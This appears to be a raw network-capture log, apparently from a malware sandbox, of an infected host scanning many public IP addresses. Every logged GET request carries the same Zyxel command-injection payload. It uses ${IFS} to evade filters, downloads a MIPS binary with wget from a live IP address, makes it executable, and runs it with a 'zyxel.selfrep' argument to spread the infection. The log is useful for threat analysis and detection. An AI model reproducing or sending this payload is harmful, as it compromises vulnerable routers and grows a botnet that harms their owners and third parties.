                                      Jan 14, 2024 15:51:00.630302906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7840192.168.2.1441494118.93.209.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630408049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7841192.168.2.1438300117.249.90.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630443096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7842192.168.2.1435476158.69.239.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630459070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7843192.168.2.1440100116.17.193.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630527020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7844192.168.2.145057884.106.78.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630584002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7845192.168.2.1459892115.224.2.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630630016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7846192.168.2.144561089.158.156.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630665064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7847192.168.2.1449978202.89.47.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630691051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7848192.168.2.1447072206.220.66.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630739927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7849192.168.2.1435440104.242.181.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630784988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7850192.168.2.1459688131.2.142.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630832911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7851192.168.2.1445358144.11.198.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630889893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7852192.168.2.1453852197.146.31.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630928040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7853192.168.2.1447504117.29.249.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630958080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7854192.168.2.144894875.171.54.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630989075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7855192.168.2.1441968192.191.117.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631031990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7856192.168.2.1455610162.84.198.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631071091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7857192.168.2.1455500181.103.72.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631099939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7858192.168.2.1442896124.130.176.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631146908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7859192.168.2.144917818.73.158.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631217957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7860192.168.2.1438178218.252.44.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631238937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7861192.168.2.144516097.25.141.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631289005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7862192.168.2.145523067.154.121.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631337881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7863192.168.2.1433750146.47.50.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631361008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7864192.168.2.144865217.162.255.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631403923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7865192.168.2.1444950176.61.161.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631463051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7866192.168.2.1438578205.36.76.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631509066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7867192.168.2.144796614.116.29.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631548882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7868192.168.2.145723071.81.200.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631592989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7869192.168.2.1449116170.169.135.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631623030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7870192.168.2.1456370212.84.111.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631678104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7871192.168.2.1452476170.175.202.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631717920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7872192.168.2.1433922137.238.98.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631755114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7873192.168.2.1449892164.73.206.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631791115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7874192.168.2.1439498216.42.208.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631848097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7875192.168.2.1446474145.63.197.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631875038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7876192.168.2.14485104.215.86.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631922960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7877192.168.2.143617276.166.38.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.631961107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7878192.168.2.1434910141.247.20.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632008076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7879192.168.2.1453600155.87.201.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632039070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7880192.168.2.144527489.125.121.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632092953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7881192.168.2.1442714158.238.99.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632133007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7882192.168.2.1438326110.233.67.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632174015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7883192.168.2.1460716188.105.248.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632196903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7884192.168.2.1441270123.83.21.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632236958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7885192.168.2.1459716158.157.173.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632282019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7886192.168.2.143499465.137.227.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632314920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7887192.168.2.143455861.81.32.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632378101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7888192.168.2.1455984103.225.238.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632405043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7889192.168.2.144546286.115.125.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632443905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7890192.168.2.1441230200.226.175.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632498980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7891192.168.2.1449148172.89.0.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632524967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7892192.168.2.1460624199.34.9.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632586956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7893192.168.2.1457124150.187.4.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632646084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7894192.168.2.1432812191.41.168.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632678032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7895192.168.2.1438002223.179.140.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632736921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7896192.168.2.144765873.224.182.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632774115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7897192.168.2.144859290.110.185.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632822990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7898192.168.2.143306638.4.221.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632855892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7899192.168.2.1451988128.81.232.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632886887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7900192.168.2.144681076.108.216.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632925987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7901192.168.2.1438882176.29.116.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.632966042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7902192.168.2.1438406204.96.27.61443
                                      TimestampBytes transferredDirectionData
